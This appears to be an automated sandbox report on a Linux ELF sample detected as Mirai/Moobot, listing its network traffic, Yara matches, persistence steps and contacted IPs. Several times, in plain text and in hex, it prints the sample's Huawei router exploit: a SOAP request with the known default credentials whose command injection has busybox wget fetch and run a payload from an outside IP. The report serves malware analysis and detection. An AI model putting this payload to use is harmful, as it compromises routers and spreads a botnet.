xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 113.66.95.51
          Source: unknownTCP traffic detected without corresponding DNS query: 41.109.134.160
          Source: unknownTCP traffic detected without corresponding DNS query: 122.238.154.25
          Source: unknownTCP traffic detected without corresponding DNS query: 61.122.23.148
          Source: unknownTCP traffic detected without corresponding DNS query: 113.167.180.50
          Source: unknownTCP traffic detected without corresponding DNS query: 197.154.145.3
          Source: unknownTCP traffic detected without corresponding DNS query: 197.50.135.0
          Source: unknownTCP traffic detected without corresponding DNS query: 137.60.152.96
          Source: unknownTCP traffic detected without corresponding DNS query: 197.4.125.26
          Source: unknownTCP traffic detected without corresponding DNS query: 161.127.238.63
          Source: unknownTCP traffic detected without corresponding DNS query: 157.202.140.177
          Source: unknownTCP traffic detected without corresponding DNS query: 41.249.139.35
          Source: unknownTCP traffic detected without corresponding DNS query: 197.191.6.8
          Source: unknownTCP traffic detected without corresponding DNS query: 41.56.211.70
          Source: unknownTCP traffic detected without corresponding DNS query: 157.185.236.211
          Source: unknownTCP traffic detected without corresponding DNS query: 41.132.98.11
          Source: unknownTCP traffic detected without corresponding DNS query: 197.68.19.229
          Source: unknownTCP traffic detected without corresponding DNS query: 197.107.162.20
          Source: unknownTCP traffic detected without corresponding DNS query: 197.174.60.2
          Source: unknownTCP traffic detected without corresponding DNS query: 197.244.224.7
          Source: unknownTCP traffic detected without corresponding DNS query: 41.169.228.69
          Source: unknownTCP traffic detected without corresponding DNS query: 157.76.14.187
          Source: unknownTCP traffic detected without corresponding DNS query: 41.30.143.132
          Source: unknownTCP traffic detected without corresponding DNS query: 41.148.20.226
          Source: unknownTCP traffic detected without corresponding DNS query: 197.223.141.146
          Source: unknownTCP traffic detected without corresponding DNS query: 197.67.169.11
          Source: unknownTCP traffic detected without corresponding DNS query: 197.198.131.180
          Source: unknownTCP traffic detected without corresponding DNS query: 197.52.236.172
          Source: unknownTCP traffic detected without corresponding DNS query: 157.47.2.0
          Source: unknownTCP traffic detected without corresponding DNS query: 197.40.126.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.34.71.4
          Source: unknownTCP traffic detected without corresponding DNS query: 65.17.4.212
          Source: unknownTCP traffic detected without corresponding DNS query: 157.184.22.246
          Source: unknownTCP traffic detected without corresponding DNS query: 41.139.140.184
          Source: unknownTCP traffic detected without corresponding DNS query: 121.61.208.71
          Source: unknownTCP traffic detected without corresponding DNS query: 157.167.73.218
          Source: unknownTCP traffic detected without corresponding DNS query: 157.186.90.102
          Source: unknownTCP traffic detected without corresponding DNS query: 197.28.204.27
          Source: unknownTCP traffic detected without corresponding DNS query: 157.160.77.243
          Source: unknownTCP traffic detected without corresponding DNS query: 197.105.52.70
          Source: unknownTCP traffic detected without corresponding DNS query: 41.195.120.236
          Source: unknownTCP traffic detected without corresponding DNS query: 213.112.8.47
          Source: unknownTCP traffic detected without corresponding DNS query: 157.153.101.69
          Source: unknownTCP traffic detected without corresponding DNS query: 41.7.246.144
          Source: unknownTCP traffic detected without corresponding DNS query: 197.215.196.144
          Source: unknownTCP traffic detected without corresponding DNS query: 41.169.82.231
          Source: unknownTCP traffic detected without corresponding DNS query: 41.93.244.82
          Source: unknownTCP traffic detected without corresponding DNS query: 157.158.216.93
          Source: 8lsvVMbYw7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: 8lsvVMbYw7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownDNS traffic detected: queries for: j.xnyidc.top

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 8lsvVMbYw7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: 8lsvVMbYw7.elf PID: 6211, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 8lsvVMbYw7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: 8lsvVMbYw7.elf PID: 6211, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: bin/busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdw5q6he3dbrsgmclkiu4to18npavj702f
          Source: classification engineClassification label: mal92.troj.linELF@0/0@2/0

          Persistence and Installation Behavior

          barindex
          Sets full permissions to files and/or directories
          Source: /bin/sh (PID: 6218)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /bin/sh (PID: 6216)Mkdir executable: /usr/bin/mkdir -> mkdir bin
          Source: /bin/sh (PID: 6218)Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1582/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/3088/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/230/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/110/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/231/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/111/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/232/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1579/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/112/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/233/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1699/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/113/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/234/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1335/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1698/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/114/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/235/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1334/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1576/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/2302/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/115/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/236/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/116/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/237/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/117/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/118/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/910/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/119/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/912/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/10/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/2307/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/11/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/918/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/12/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/13/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/14/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/6121/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/15/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/16/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/17/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/18/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1594/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/120/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/121/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1349/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/122/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/243/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/123/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/2/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/124/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/3/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/4/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/125/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/126/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1344/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1465/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1586/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/127/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/6/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/248/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/128/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/249/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1463/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/800/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/9/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/801/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/20/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/21/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1900/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/22/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/23/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/24/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/25/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/26/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/27/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/28/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/29/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/491/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/250/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/130/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/251/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/252/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/132/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/253/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/254/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/255/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/256/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1599/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/257/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1477/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/379/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/258/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1476/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/259/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1475/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/936/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/30/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/2208/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/35/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1809/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/1494/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/260/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/261/cmdline
          Source: /tmp/8lsvVMbYw7.elf (PID: 6221)File opened: /proc/141/cmdline
          Source: /usr/bin/chmod (PID: 6218)File: /tmp/bin/watchdog (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
          Source: /tmp/8lsvVMbYw7.elf (PID: 6213)Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/8lsvVMbYw7.elf bin/watchdog; chmod 777 bin/watchdog"
          Source: /bin/sh (PID: 6215)Rm executable: /usr/bin/rm -> rm -rf bin/watchdog

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45328 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 45328
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39438 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58096 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58096
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49508 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42520 -> 37215
          Source: /tmp/8lsvVMbYw7.elf (PID: 6211)Queries kernel information via 'uname':
          Source: 8lsvVMbYw7.elf, 6211.1.000055f113c26000.000055f113cad000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
          Source: 8lsvVMbYw7.elf, 6211.1.000055f113c26000.000055f113cad000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
          Source: 8lsvVMbYw7.elf, 6211.1.00007ffcfa1dd000.00007ffcfa1fe000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
          Source: 8lsvVMbYw7.elf, 6211.1.00007ffcfa1dd000.00007ffcfa1fe000.rw-.sdmpBinary or memory string: nx86_64/usr/bin/qemu-mips/tmp/8lsvVMbYw7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/8lsvVMbYw7.elf

          Stealing of Sensitive Information

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: 8lsvVMbYw7.elf, type: SAMPLE
          Source: Yara matchFile source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: 8lsvVMbYw7.elf, type: SAMPLE
          Source: Yara matchFile source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: 8lsvVMbYw7.elf, type: SAMPLE
          Source: Yara matchFile source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: 8lsvVMbYw7.elf, type: SAMPLE
          Source: Yara matchFile source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting          		Path InterceptionPath Interception2
          File and Directory Permissions Modification          		1
          OS Credential Dumping          		11
          Security Software Discovery          		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Scripting          		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          File Deletion          		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud

          Malware Configuration

          No configs have been found

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830708 Sample: 8lsvVMbYw7.elf Startdate: 20/03/2023 Architecture: LINUX Score: 92 27 j.xnyidc.top 2->27 29 197.211.54.73 globacom-asNG Nigeria 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 4 other signatures 2->39 8 8lsvVMbYw7.elf 2->8         started        signatures3 process4 process5 10 8lsvVMbYw7.elf sh 8->10         started        12 8lsvVMbYw7.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 sh mv 10->21         started        23 8lsvVMbYw7.elf 12->23         started        25 8lsvVMbYw7.elf 12->25         started        signatures7 41 Sets full permissions to files and/or directories 14->41

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          8lsvVMbYw7.elf61%VirustotalBrowse
          8lsvVMbYw7.elf64%ReversingLabsLinux.Trojan.Mirai

          Dropped Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          j.xnyidc.top13%VirustotalBrowse

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          j.xnyidc.top
          		156.224.24.249
          		truetrueunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/8lsvVMbYw7.elffalse
            		high
            http://schemas.xmlsoap.org/soap/envelope/8lsvVMbYw7.elffalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              41.122.249.23
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              197.216.246.226
              		unknownAngola
              		11259ANGOLATELECOMAOfalse
              41.215.59.33
              		unknownKenya
              		15808ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKEfalse
              108.47.210.80
              		unknownUnited States
              		5650FRONTIER-FRTRUSfalse
              86.2.184.216
              		unknownUnited Kingdom
              		5089NTLGBfalse
              197.187.29.137
              		unknownTanzania United Republic of
              		37133airtel-tz-asTZfalse
              197.164.30.176
              		unknownEgypt
              		24863LINKdotNET-ASEGfalse
              163.159.243.10
              		unknownSlovenia
              		15435KABELFOONDELTAFiberNederlandNLfalse
              85.3.140.152
              		unknownSwitzerland
              		3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
              157.163.19.152
              		unknownGermany
              		22192SSHENETUSfalse
              157.114.152.203
              		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
              197.215.104.9
              		unknownSierra Leone
